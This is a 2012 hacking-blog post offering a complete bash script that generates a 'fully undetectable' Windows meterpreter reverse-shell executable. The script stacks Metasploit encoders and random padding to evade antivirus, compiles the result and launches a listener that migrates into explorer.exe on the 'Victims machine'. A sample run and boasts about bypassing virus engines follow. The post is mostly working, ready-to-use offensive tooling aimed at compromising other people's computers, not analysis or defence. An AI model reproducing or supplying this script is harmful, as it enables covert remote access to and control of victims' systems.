Search Here - Downloads / News / Videos
Breaking News
Loading...
Home Scripts Metasploit FUD Payload generator

Metasploit FUD Payload generator

Based on coresec.org article to create fully undetectable metasploit payload,
i have modified the to payload to work with both WAN and LAN IP.
So it is possible to exploit a system outside a network :)

Code : 

#!/bin/bash
echo "************************************************************"
echo "    Automatic  shellcode generator - FOR METASPLOIT         "
echo "              By Astr0baby 2011 Modified By DJ MAK 2012     "
echo "  With some Randomic gravy and sauce to bypass Antivirus    "
echo "    For Automatic Teensy programming and deployment         "
echo "************************************************************"

Code : 

rm -rf ShellCode

echo -e "1) LanIP \n2) WanIP?"
read netchoice
case $netchoice in
1)      echo "Here is a network device list available on yor machine"
        cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
        echo -e "What network interface are we gonna use ?  \c"
        read interface
        IP=`ifconfig $interface  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
2)      echo -e "======Getting your WAN IP========="
        IP=`wget -q -O - http://checkip.dyndns.org | cut -d ':' -f2 | cut -d '<' -f1 | cut -d ' ' -f2`;;
esac
echo $IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
read seed
echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c"
read enumber
msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | msfencode -e x86/shikata_ga_nai -c $enumber -t raw | msfencode -e x86/jmp_call_additive -c $enumber -t raw | msfencode -e x86/call4_dword_xor -c $enumber -t raw | msfencode -e x86/shikata_ga_nai -c $enumber  > test.c
mkdir ShellCode
mv test.c ShellCode
cd ShellCode
#Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include " >> temp
echo 'unsigned char ufs[]=' >> temp
for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
sed -i 's/$/"/' temp2
sed -i 's/^/"/' temp2
echo  ';' >> temp2
cat temp2 >> temp
cat ready.c >> temp
mv temp ready2.c
echo ";" >> ready2.c
echo "int main(void) { ((void (*)())micro)();}" >> ready2.c
mv ready2.c final.c
echo 'unsigned char tap[]=' > temp3
for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
sed -i 's/$/"/' temp4
sed -i 's/^/"/' temp4
echo  ';' >> temp4
cat temp4 >> temp3
cat temp3 >> final.c
#Cleanup
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4

/usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
mv final.exe $RANDOM.exe
filex=`ls -ct1 | head -1`
sumx=`sha1sum $filex`
echo $filex "...generated in ShellCode subfolder"
echo $filex "sha1checksum is .." $sumx
strip --strip-debug $filex
cd ..
echo "      starting the meterpreter listener..."
sleep 2
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript='migrate.rb -n explorer.exe' E

Save the file as fud.sh
And set the permission to Execute :
Code : 

root@t3amas5assin:~/Desktop# chmod +x fud.sh
root@t3amas5assin:~/Desktop# ./fud.sh
************************************************************
    Automatic  shellcode generator - FOR METASPLOIT
              By Astr0baby 2011 Modified By DJ MAK 2012
  With some Randomic gravy and sauce to bypass Antivirus
    For Automatic Teensy programming and deployment
************************************************************
1) LanIP
2) WanIP?
2
======Getting your WAN IP=========
114.79.135.104
What Port Number are we gonna listen to? : 5676
Please enter a random seed number 1-10000, the larger the number the 
larger the resulting executable : 1000
And lastly how many times do we want to encode our payloads 1-20? : 5
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

[*] x86/jmp_call_additive succeeded with size 457 (iteration=1)

[*] x86/jmp_call_additive succeeded with size 489 (iteration=2)

[*] x86/jmp_call_additive succeeded with size 521 (iteration=3)

[*] x86/jmp_call_additive succeeded with size 553 (iteration=4)

[*] x86/jmp_call_additive succeeded with size 585 (iteration=5)

[*] x86/call4_dword_xor succeeded with size 614 (iteration=1)

[*] x86/call4_dword_xor succeeded with size 642 (iteration=2)

[*] x86/call4_dword_xor succeeded with size 670 (iteration=3)

[*] x86/call4_dword_xor succeeded with size 698 (iteration=4)

[*] x86/call4_dword_xor succeeded with size 726 (iteration=5)

[*] x86/shikata_ga_nai succeeded with size 753 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 780 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 807 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 834 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 861 (iteration=5)

31963.exe ...generated in ShellCode subfolder
31963.exe sha1checksum is..675ee8fa2daf8533fe2c2ebe941de78948fa776a 31963.exe
      starting the meterpreter listener...

As soon as the the payload is executed on the Victims machine
it will automatically migrate to explorer.exe Process

dj mak

The payload is almost undetectable from most of the virus Engines!!!!
Posted by at Sunday, March 18, 2012
Labels:

1 comments:

  1. AnonymousFebruary 25, 2013 at 4:49 PM

    This comment has been removed by a blog administrator.

    ReplyDelete

Subscribe to: Post Comments (Atom)
Copyright © 2012 HackWithMak All Right Reserved
Posts RSS
Comments RSS